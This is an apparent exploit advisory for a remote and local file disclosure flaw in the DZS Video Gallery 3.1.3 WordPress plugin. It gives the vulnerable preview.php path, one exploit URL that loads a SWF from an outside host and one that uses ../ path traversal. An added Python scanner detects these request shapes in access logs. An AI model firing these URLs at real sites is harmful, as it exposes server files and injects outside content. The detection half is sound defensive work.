WordPress Plugin DZS Video Gallery 3.1.3 – Remote and Local File Disclosure Vulnerability

Exploit:
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=[SWF LINK]

http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=http://www.cristgaming.com/pirate.swf
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../uploads/2013/12/The_Exorcist.swf
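Detection for the two request shapes above, as an added example that is not part of the original advisory: it scans web server access logs for requests to preview.php whose swfloc value is an absolute URL or contains ../ sequences. It assumes Combined Log Format; the function names are hypothetical and the log entries are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path named in the advisory (site prefix such as /wp may precede it).
TARGET = "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"
# Request line of a Combined Log Format entry: "METHOD URI PROTOCOL"
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_swfloc(value):
    """Return 'remote', 'traversal' or None for one swfloc value."""
    prev = None
    while prev != value:  # decode until stable to catch double encoding
        prev, value = value, unquote(value)
    v = value.strip().lower().replace("\\", "/")
    if re.match(r"([a-z][a-z0-9+.-]*:)?//", v):
        return "remote"      # absolute or scheme-relative URL
    if "../" in v or v.endswith(".."):
        return "traversal"   # climbs out of the expected directory
    return None

def scan_log(lines):
    """Return (line_number, label, swfloc) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not unquote(url.path).lower().endswith(TARGET):
            continue
        for value in parse_qs(url.query).get("swfloc", []):
            label = classify_swfloc(value)
            if label:
                hits.append((n, label, value))
    return hits

# Constructed sample entries (documentation addresses and hostnames).
_P = '/wp' + TARGET
_T = ' - - [10/Jan/2014:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    '203.0.113.5' + _T + _P + '?swfloc=http://files.example.test/a.swf HTTP/1.1" 200 512',
    '203.0.113.5' + _T + _P + '?swfloc=..%2F..%2F..%2F..%2Fuploads%2Fclip.swf HTTP/1.1" 200 512',
    '198.51.100.7' + _T + _P + '?swfloc=preview.swf HTTP/1.1" 200 512',
    '198.51.100.7' + _T + '/wp/index.php?swfloc=../../x HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```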